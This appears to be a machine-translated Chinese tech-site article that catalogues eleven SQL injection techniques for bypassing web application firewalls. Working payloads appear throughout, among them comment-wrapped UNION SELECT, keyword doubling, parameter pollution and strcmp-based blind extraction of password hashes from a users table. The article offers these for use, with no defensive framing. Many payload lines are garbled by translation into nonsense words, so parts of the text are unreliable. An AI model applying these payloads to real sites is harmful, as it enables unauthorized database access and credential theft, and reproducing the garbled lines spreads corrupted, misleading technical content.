Shulou(Shulou.com)06/01 Report--

1. Case bypass

This is familiar to everyone, but it works well for some WAF that is too rubbish, such as intercepting union, then use Union UnIoN and so on to bypass.

two。 Simple coding bypass

For example, if WAF detects keywords, then we can make it impossible for him to detect them. For example, to detect union, we will use% 55, that is, the hexadecimal code of U, instead of UMagol union to write% 55nION. You can also bypass some WAF by combining case and case. You can replace one or more of them at will.

There are also people in Mysql injection, such as table names or load files, will use the file name or indicate that using hexadecimal encoding to bypass WAF is in this category.

3. Comment Bypass

This is rare and applies to WAF only filtering a dangerous statement without blocking our entire query.

01.Universe selectmakers 1 pencils 2 pencils 3 paces *

For example, for the above query, WAF filtered union and select once, so we wrote a comment statement earlier and asked him to filter out the comments, which did not affect our query.

So the bypass statement is:

01.According to Universe Universe, Universe Universe SelectAccording to SelectAccording to Universe Universe

There is also a bypass related to comments:

For example:

01.index.php?page_id=-15 / *! UNION*/ / *! SELECT*/ 1pm 2jue 3je 4...

As you can see, as long as we put sensitive words in the comments, note that one should be added in front of them!

4. Separation and rewriting bypass

Again, the above example applies to situations where WAF uses regular expressions and detects all sensitive words, regardless of where you write, filtering a few of them.

We can separate sensitive words by annotations so that WAF's rules don't work and our results are not affected when we bring them into the query.

01.According to unracking, ionizing, selling, racing, ectprinting, unwinding, unracking, racing, etc.

As for rewriting bypass, it works when WAF filters once, and we can write something like Ununionion in the same way we upload aaspsp horses. Filter the union once and our query will be executed.

01.?id=1 ununionion select 1, 2, 2, 3, 2, 3, etc.-

5.Http parameter pollution (HPP)

For example, we have a sentence like this:

01./?id=1 union select+1,2,3+from+users+where+id=1--

We can repeat the previous id value to add our value to bypass & id= will become a comma when querying:

01./?id=1 union select+1&id=2,3+from+users+where+id=1--

There are many conditions for success in this case, depending on the specific WAF implementation.

Give another example to illustrate the usage:

01.According to UBG / UsMY / USML / UsMel-

The specific analysis involves the writing of the background code of the query statement.

For example, the server says something like this:

01.select * from table where a = ". $_ GET ['a']." And b = ". $_ GET ['b']." Limit ". $_ GET ['c']

Then we can construct an injection statement like this:

01.Compact after a match with a unionplac, it is bounded with a password select1 from a password with a password from a user, from a user to a user

The final resolution is as follows:

01.select * from table where axiom 1 union/* and b=*/select 1 forward password limit * / from users--

As you can see, this method is actually more suitable for white box testing, but for black boxes, it is more troublesome to use. But you can try.

6. Use the logical operator or / and to bypass

01./?id=1+OR+0x50=0x50

02./?id=1+and+ascii (lower (mid ((select+pwd+from+users+limit+1,1), 1meme 1) = 74

By the way, to explain the second sentence, start with the innermost parentheses. Select+pwd+from+users+limit+1,1 is the first record that queries the pwd field from the users table, such as admin.

And then mid (previous sentence), 1 mid 1 is to take the first character of admin, that is, a.

Lower is to convert characters to lowercase.

Then ascii converts an into ascii code, which is not equal to 74.

7. Comparison operator replacement

Including! = not equal to, not equal to

Greater than, these can be used instead of = to bypass.

For example, in the previous example, to determine whether it is 74, suppose = is filtered, then we can determine whether it is greater than 73, whether it is less than 75, and then we know that it is 74. no, no, no. A lot of WAF will forget this.

8. Substitution of the same function

Substring () can be replaced with functions such as mid () and substr (), all of which are used to take a bit of a character in a string.

The Ascii () code can be replaced with hex (), bin (), that is, hexadecimal and binary codes. Benchmark () can be replaced with sleep (), and these two uses are introduced in delay-based blind notes.

If even these are blocked, there is a new way:

01. Substring ((select 'password'), 1) = 0x70

02.substr ((select 'password'), 1) = 0x70

03.mid ((select 'password'), 1) = 0x70

For example, these three items all judge the value of the first character from password. You can use:

01.strcmp (left ('password',1), 0x69) = 1

02.strcmp (left ('password',1), 0x70) = 0

03.strcmp (left ('password',1), 0x71) =-1

To replace, left is used to take the value of 1 bit from the left of the string, strcmp is used to compare two values, if the comparison result is equal, it is 0, if the left is small, it is-1, otherwise it is 1.

And the group_concat and concat and concat_ws I mentioned in the previous article can also be replaced with each other.

9. Blind injection does not need or and and

For example, there is an injection point like this:

01.index.php?uid=123

And and or are filtered. In fact, there is a more direct way to modify the 123s generated for our statements:

01.index.php?uid=strcmp (left ((select+hash+from+users+limit+0,1), 1), 0x42) + 123

The page is correct at 123, and we are now blindly guessing the first place of hash. If the first bit is equal to 0x42, that is, B, then the strcmp result is 099123, so the page should be correct. Otherwise, it means it's not B, so guess, you don't need and and or.

10. Add parentheses

01.Union+ (select+1,2+from+users)

For example, the above one was intercepted by WAF. Try adding some parentheses:

01.Union+ (select+1,2+from+xxx)

02. Union (select (1), mid (hash,1,32) from (users))

03.Union+ (select'1',concat (login,hash) from+users)

04.According to union (select (1), hex (hash) from (users))

05.According to (1) or (0x50=0x50)

11. Buffer overflow bypass

This is seen from a foreign blog:

01.id=1 and (select 1) = (Select 0xAAAAAAAAAAAAAAAAAAAAA) + UnIoN+SeLeCT+1,2,version (), 4, 5, user ()

8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26

02. 27, 28, 29, 30, 31, 32, 33, 34, 35, 36 and 36.

Among them, the more A here in 0xAAAAAAAAAAAAAAAAAAAAA, the better, which generally requires more than 1000.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.